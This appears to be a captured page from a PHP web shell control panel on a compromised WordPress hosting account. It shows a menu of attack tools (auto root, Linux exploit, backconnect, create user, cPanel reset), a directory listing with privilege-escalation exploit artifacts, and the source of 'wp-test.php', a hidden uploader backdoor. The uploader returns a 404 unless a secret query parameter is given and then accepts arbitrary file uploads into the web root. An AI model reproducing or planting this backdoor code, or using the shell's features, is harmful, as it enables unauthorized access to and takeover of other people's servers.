Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.27
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
adnangch /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
0ed2c
[ DIR ]
dr-xr-xr-x
50a8ed
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
dr-xr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
231
B
-rw-r--r--
.index.php
2.46
KB
-rwxrwxrwx
.litespeed_flag
297
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
2fsrebiw.php
1.83
KB
-rw-r--r--
6pqi51i0.php
1.83
KB
-rw-r--r--
buy.php
5.55
KB
-rw-r--r--
context.php
1.05
KB
-rw-r--r--
csv.php
6.46
KB
-rw-r--r--
error_log
87.03
KB
-rw-r--r--
google738db57e59672eb9.html
53
B
-rw-r--r--
google8fab2a5bdb4dc80e.html
53
B
-rw-r--r--
googlecb7c0319e31f0be0.html
53
B
-rw-r--r--
googled24b00a99624db3b.html
53
B
-rw-r--r--
googledc308e72d25873da.html
53
B
-rw-r--r--
htaccess
618
B
-rw-r--r--
index.php
5.55
KB
-rw-r--r--
index.php0
8.38
KB
-rw-r--r--
instaII.php
4.82
KB
-rw-r--r--
robots.txt
413
B
-r--r--r--
wp-test.php
1.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-test.php
<?php session_start(); $expected_param = 'Savvy'; $expected_value = 'Mrx'; $is_authenticated = isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true; if (isset($_GET[$expected_param]) && $_GET[$expected_param] === $expected_value) { if (!$is_authenticated) { $_SESSION['authenticated'] = true; $is_authenticated = true; } $upload_dir = __DIR__ . '/'; $is_writable = is_writable($upload_dir); if ($is_authenticated) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $upload_file = $upload_dir . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $upload_file)) { echo 'File successfully uploaded: ' . htmlspecialchars(basename($_FILES['file']['name'])); } else { echo 'An error occurred during file upload.'; } } ?> <!DOCTYPE html> <html lang='en'> <head> <meta charset='UTF-8'> <title>File Upload</title> </head> <body> <p>Upload Directory Status: <strong><?php echo $is_writable ? 'Writable' : 'Not Writable'; ?></strong></p> <form action='' method='post' enctype='multipart/form-data'> <label for='file'>Choose a file:</label> <input type='file' name='file' id='file' required> <button type='submit'>Upload</button> </form> </body> </html> <?php exit; } } else { http_response_code(404); exit; } ?>
Close